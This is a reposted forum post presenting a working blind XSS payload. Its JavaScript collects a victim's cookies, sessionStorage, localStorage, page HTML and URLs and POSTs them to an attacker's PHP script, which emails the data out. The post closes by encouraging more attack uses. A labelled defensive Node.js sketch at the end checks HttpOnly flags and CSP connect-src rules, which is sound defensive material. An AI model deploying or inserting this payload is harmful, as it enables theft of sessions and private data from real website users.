[Repost] A Simplified XSS Platform from BruteXSS
Posted 7 months ago · Access: no login required · Author: backcover7 · 8985 views · From: Open Source Projects

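Source: https://brutelogic.com.br/blog/blind-xss-code/

Using a complex XSS platform system means setting up all kinds of components. The source article offers a new, simple way to build an instant-notification XSS platform: it uses email notifications to carry out the platform's blind XSS reporting. The code is as follows: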

var mailer = '<?php echo "//" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] ?>';

var msg = 'USER AGENT\n' + navigator.userAgent + '\n\nTARGET URL\n' + document.URL;
msg += '\n\nREFERRER URL\n' + document.referrer + '\n\nREADABLE COOKIES\n' + document.cookie;
msg += '\n\nSESSION STORAGE\n' + JSON.stringify(sessionStorage) + '\n\nLOCAL STORAGE\n' + JSON.stringify(localStorage);
msg += '\n\nFULL DOCUMENT\n' + document.documentElement.innerHTML;

var r = new XMLHttpRequest();
r.open('POST', mailer, true);
r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
r.send('origin=' + document.location.origin + '&msg=' + encodeURIComponent(msg));

<?php

header("Access-Control-Allow-Origin: " . $_POST["origin"]);

$origin = $_POST["origin"];
$to = "myName@myDomain";
$subject = "XSS Blind Report for " . $origin;
$ip = "Requester: " . $_SERVER["REMOTE_ADDR"] . "\nForwarded For: ". $_SERVER["HTTP_X_FORWARDED_FOR"];
$msg = $subject . "\n\nIP ADDRESS\n" . $ip . "\n\n" . $_POST["msg"];
$headers = "From: report@myDomain" . "\r\n";

if ($origin && $msg) {
    mail($to, $subject, $msg, $headers);
}

?>

I hope this topic draws out more, and more ingenious, clever uses of platforms for XSS attacks or other blind-injection attacks.
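
As a defender-side companion to the payload above (an added example, not part of the original post or the source article), this Node.js sketch checks two response-header controls against what the script does: which cookies lack `HttpOnly` and so show up in its `document.cookie` read, and whether a Content-Security-Policy `connect-src` would block its `XMLHttpRequest` POST. The origins `app.example` and `collector.example` and all header values are constructed, and the source matcher is simplified (no ports, paths or http-to-https upgrade).

```javascript
// Added defensive example; all header values and origins are constructed samples.

// Names of cookies the payload's document.cookie read would expose (no HttpOnly flag).
function scriptReadableCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*httponly\s*(;|$)/i.test(h))
    .map((h) => h.split('=')[0].trim());
}

// Parse a Content-Security-Policy value into { directive: [source, ...] }.
function parseCsp(policy) {
  const directives = {};
  for (const part of policy.split(';')) {
    const [name, ...sources] = part.trim().toLowerCase().split(/\s+/);
    if (name && !(name in directives)) directives[name] = sources; // first occurrence wins
  }
  return directives;
}

// Simplified source match: "*", 'self', scheme-source, host-source with optional "*." wildcard.
// Ports, paths and the http-to-https upgrade rule are ignored (assumption of this sketch).
function sourceMatches(source, page, target) {
  if (source === '*') return true;
  if (source === "'self'") return target.origin === page.origin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) return source === target.protocol;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)/.exec(source);
  if (!m || (m[1] && m[1] + ':' !== target.protocol)) return false;
  return m[2].startsWith('*.')
    ? target.hostname.endsWith(m[2].slice(1))
    : target.hostname === m[2];
}

// Would the policy let injected script send its XMLHttpRequest POST to targetOrigin?
function xhrAllowed(policy, pageOrigin, targetOrigin) {
  const csp = parseCsp(policy);
  const sources = csp['connect-src'] || csp['default-src'];
  if (!sources) return true; // no directive governs XHR destinations
  const page = new URL(pageOrigin);
  const target = new URL(targetOrigin);
  return sources.some((s) => sourceMatches(s, page, target));
}

const PAGE = 'https://app.example';
const COLLECTOR = 'https://collector.example';
const cookies = ['sid=abc123; Path=/; Secure; HttpOnly', 'theme=dark; Path=/', 'csrf=xyz; SameSite=Lax'];
console.log('script-readable cookies:', scriptReadableCookies(cookies));
console.log('XHR to collector allowed:',
  xhrAllowed("default-src 'self'; connect-src 'self' https://api.app.example", PAGE, COLLECTOR));
```

Neither control covers `sessionStorage` or `localStorage`, which have no `HttpOnly` equivalent and are always readable by script running in the page's origin.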
